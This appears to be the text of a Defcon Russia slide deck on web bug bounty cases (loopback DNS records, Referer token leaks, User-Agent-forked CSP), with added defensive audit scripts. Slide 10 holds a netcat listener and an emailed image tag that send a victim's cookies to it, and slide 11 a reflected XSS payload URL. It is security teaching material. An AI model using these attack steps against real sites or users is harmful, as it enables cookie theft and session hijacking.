6. Situation #1 – Same Site Scripting
Defcon Russia (DCG #7812) 6
7. Situation #1 – Same Site Scripting
XXXYYYZZZ.target.com => 127.0.0.1
What's wrong? A name under target.com resolves to loopback, so anything listening on the victim's own machine is now reachable under a *.target.com host name.
8. Situation #1 – Same Site Scripting
9. Situation #1 – Same Site Scripting
External IP – 12.34.56.78
Loopback – 127.0.0.1
10. Situation #1 – Same Site Scripting
Attacker (the listener must run on the host where the victim's browser runs, e.g. an unprivileged account on a shared workstation, because the name resolves to loopback):
1) nc -lv 10024
2) email to victim@corp.xxx with
<img src="http://xxyyzz.target.com:10024/">
Victim:
1) Opens the email and...
2) loads the "image", sending the *.target.com cookies to the listener! Cookie scope is by host name only; neither the port nor the address the name resolves to is consulted.
(That is why it is important to know how to set cookies correctly, i.e. host-only vs Domain cookies and the Secure flag -
http://habrahabr.ru/post/143276/)
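To see exactly which cookies the browser attaches to the request for the "image", here is an added example (not from the deck) that models RFC 6265 cookie scoping: domain matching, host-only cookies and the Secure flag. The cookie jar is a constructed assumption about what www.target.com might have set; the request URL is the one on the slide.

```python
"""Which cookies does a browser attach to http://xxyyzz.target.com:10024/ ?
Added example (not from the deck): a minimal RFC 6265 cookie-scoping model.
The cookie jar below is constructed for illustration."""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlsplit


@dataclass
class Cookie:
    name: str
    set_by_host: str               # host that issued the Set-Cookie
    domain: Optional[str] = None   # Domain attribute; None => host-only cookie
    secure: bool = False           # Secure attribute


def _is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def domain_matches(request_host: str, cookie_domain: str) -> bool:
    """RFC 6265 5.1.3: the request host equals the cookie domain or is a
    subdomain of it (leading dot ignored; IP literals never domain-match)."""
    host = request_host.lower().rstrip(".")
    dom = cookie_domain.lower().strip(".")
    if host == dom:
        return True
    return host.endswith("." + dom) and not _is_ip(host)


def cookies_sent(jar: List[Cookie], url: str) -> List[str]:
    """Names of the cookies a browser would attach to a request for `url`.
    Note what is NOT consulted: the port (10024 here) and the address the
    host name resolves to (127.0.0.1). Only scheme and host name matter."""
    p = urlsplit(url)
    host = p.hostname.lower()
    sent = []
    for c in jar:
        if c.secure and p.scheme != "https":
            continue                                   # Secure: https only
        if c.domain is None:
            if host == c.set_by_host.lower():          # host-only: exact host
                sent.append(c.name)
        elif domain_matches(host, c.domain):           # Domain cookie
            sent.append(c.name)
    return sent


# Constructed jar: what www.target.com might have set in the victim's browser.
JAR = [
    Cookie("session", "www.target.com", domain=".target.com"),             # leaks to any *.target.com
    Cookie("csrf", "www.target.com"),                                      # host-only: stays home
    Cookie("admin", "www.target.com", domain=".target.com", secure=True),  # Secure: not over http
]

if __name__ == "__main__":
    print(cookies_sent(JAR, "http://xxyyzz.target.com:10024/img.png"))
    print(cookies_sent(JAR, "https://www.target.com/"))
```

Only the `session` cookie, set with `Domain=.target.com`, reaches the loopback listener; the host-only `csrf` cookie and the `Secure` `admin` cookie do not. Scoping cookies to the exact host that needs them, and marking them `Secure`, is the mitigation on the application side; removing the loopback record is the fix on the DNS side.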
11. Situation #1 – Same Site Scripting
http://localhost.domain.com:631/<SCRIPT>XSS</SCRIPT>.shtml
(Port 631 is the local CUPS print service. If a service on the victim's own host reflects the request path unescaped, that reflected XSS now runs under a *.domain.com host name, inside the site's cookie scope.)
12. Situation #1 – Same Site Scripting
13. Situation #1 – Same Site Scripting
XXXYYYZZZ.target.com => 10.0.0.22
A public record pointing at a private address: whoever controls that internal host, or can answer for it on the internal network, serves content as *.target.com. More examples:
http://lab.onsec.ru/2013/07/insecure-dns-records-in-top-web-projects.html
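The two cases above (a record resolving to 127.0.0.1 and one resolving to 10.0.0.22) are the same class of bug, and checking a zone for them is mechanical. Here is an added example (not from the deck or from the linked article) that classifies what each name resolves to. The candidate names and the offline answer table are constructed; pass the live resolver to run it against a zone you are authorised to test.

```python
"""Audit names under a domain for records that resolve to loopback, private
or link-local addresses. Added example, not from the deck. The answer table
below is a constructed stand-in for real DNS so the script runs offline."""
import ipaddress
import socket
from typing import Callable, Dict, List, Optional, Tuple


def classify(ip_str: str) -> Optional[str]:
    """Why an address is risky as a public *.target.com record, or None."""
    ip = ipaddress.ip_address(ip_str)
    if ip.is_loopback:
        return "loopback"        # same-site scripting: the victim's own host
    if ip.is_link_local:
        return "link-local"
    if ip.is_private:
        return "private"         # anyone on the internal network can answer
    if ip.is_unspecified:
        return "unspecified"
    return None


def resolve_all(name: str) -> List[str]:
    """Live resolver (A and AAAA) via the system stub resolver."""
    try:
        return sorted({ai[4][0] for ai in socket.getaddrinfo(name, None)})
    except socket.gaierror:
        return []


def audit(names, resolver: Callable[[str], List[str]] = resolve_all
          ) -> Dict[str, List[Tuple[str, str]]]:
    """Map each risky name to its (address, reason) pairs."""
    findings = {}
    for name in names:
        reasons = [(addr, classify(addr)) for addr in resolver(name)]
        flagged = [(addr, why) for addr, why in reasons if why]
        if flagged:
            findings[name] = flagged
    return findings


# Constructed answers standing in for real DNS (assumption, not real data).
FAKE_ZONE = {
    "www.target.com": ["12.34.56.78"],
    "localhost.target.com": ["127.0.0.1", "::1"],
    "xxxyyyzzz.target.com": ["10.0.0.22"],
    "dev.target.com": ["fe80::1"],
    "gone.target.com": [],
}

if __name__ == "__main__":
    offline = lambda n: FAKE_ZONE.get(n, [])
    for name, hits in audit(FAKE_ZONE, resolver=offline).items():
        print(name, hits)
```

Feed it the output of a zone transfer or a subdomain brute-force list; any name that comes back `loopback` is the slide-7 case, any `private` hit is the slide-13 case.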
14. Situation #1 – Same Site Scripting
https://hackerone.com/reports/1509 - $100
23. Situation #3 - HTTP referer
<a href="http://external.com">Go!</a>
In the request headers, the browser tells the destination where the click came from:
...
Referer: http://yoursite.com/
...
But what about external resources embedded in the web page,
such as images, styles...? They are fetched with a Referer too.
24. Situation #3 - HTTP referer
http://super-website.com/user/passRecovery?t=SECRET
...
<img src=http://comics-are-awesome.com/howto-choose-password.jpg>
...
The owner of comics-are-awesome.com
learns every _SECRET_ token (from the Referer of the image request)!
26. Situation #5 - Content-Security-Policy
27. Situation #5 - Content-Security-Policy
28. Situation #5 - Content-Security-Policy
CSP is sent only to some browsers (selected by User-Agent)!
Is that OK?
29. Situation #5 - Content-Security-Policy
1) Code forks on the User-Agent string
2) Proxy caches
3) Load balancers...
The bug hunter got $100, but...
30. Situation #5 - Content-Security-Policy
Fail! Why (quoting the browser support notes):
• "Partial support in Internet Explorer 10-11 refers to the browser only supporting the 'sandbox' directive by using the 'X-Content-Security-Policy' header."
• "Partial support in iOS Safari 5.0-5.1 refers to the browser recognizing the X-Webkit-CSP header but failing to handle complex cases correctly, often resulting in broken pages."
• "Chrome for iOS fails to render pages without a connect-src 'self' policy."
• Old Firefox problems (some versions between XX and YY)
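Slides 28-30 make two points: a policy forked on User-Agent leaves some browsers with no policy at all, and once a proxy cache or load balancer sits in front, the cached variant can be served to the wrong browser. Here is an added example (not from the deck) that audits one URL's response headers as seen under several User-Agents for both problems. The sample responses are constructed to mimic the situation on the slides; `audit_csp` is my name.

```python
"""Does every browser get the policy, and can a shared cache undo it?
Added example, not from the deck: audit a URL's response headers captured
under different User-Agents. SAMPLE and FIXED are constructed inputs."""
from typing import Dict, List

PRIMARY = "content-security-policy"
LEGACY = ("x-content-security-policy", "x-webkit-csp")


def _norm(headers: Dict[str, str]) -> Dict[str, str]:
    return {k.lower(): v for k, v in headers.items()}


def audit_csp(responses: Dict[str, Dict[str, str]]) -> List[str]:
    """responses: {user_agent_label: {header: value}} for the same URL.
    Returns human-readable findings; an empty list means one consistent
    policy reached every browser."""
    findings = []
    policies = {}
    for ua, raw in responses.items():
        h = _norm(raw)
        policies[ua] = h.get(PRIMARY)
        if policies[ua] is None:
            legacy = [k for k in LEGACY if k in h]
            note = f" (only legacy {', '.join(legacy)})" if legacy else ""
            findings.append(f"{ua}: no Content-Security-Policy header{note}")
    if len(set(policies.values())) > 1:
        # The policy differs per UA. Any cacheable copy served without
        # 'Vary: User-Agent' can be handed to the wrong browser by a proxy
        # cache or load balancer, so the fork is not a reliable control.
        for ua, raw in responses.items():
            h = _norm(raw)
            cc = h.get("cache-control", "").lower()
            cacheable = "no-store" not in cc and "private" not in cc
            vary = [v.strip().lower() for v in h.get("vary", "").split(",")]
            if cacheable and "user-agent" not in vary:
                findings.append(f"{ua}: policy is UA-dependent but the response "
                                "is cacheable without Vary: User-Agent")
    return findings


# Constructed sample: one page, three User-Agents, policy forked per UA.
SAMPLE = {
    "chrome": {"Content-Security-Policy": "default-src 'self'",
               "Cache-Control": "public, max-age=600"},
    "ie10":   {"X-Content-Security-Policy": "sandbox",
               "Cache-Control": "public, max-age=600"},
    "safari": {"Cache-Control": "public, max-age=600"},
}

# The fix: the same header for every UA, so caching cannot strip it.
FIXED = {ua: {"Content-Security-Policy": "default-src 'self'",
              "Cache-Control": "public, max-age=600"} for ua in SAMPLE}

if __name__ == "__main__":
    for finding in audit_csp(SAMPLE):
        print(finding)
    print("fixed:", audit_csp(FIXED))
```

Browsers that do not understand `Content-Security-Policy` simply ignore it, so there is no reason to withhold it from anyone; send one policy unconditionally and the cache question disappears with the fork.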
35. Situations XXX
• Info disclosure via CSS files (full path disclosure from asset compilation):
file:///applications/hackerone/releases/20140221175929/app/assets/stylesheets/application/browser-not-supported.scss (bug #2221)
• SPF and similar DNS records
• Short tokens
• Pixel flood attack
• CSRF on login/logout!? (hi Michal Zalewski!)
• ... - https://hackerone.com/security?show_all=true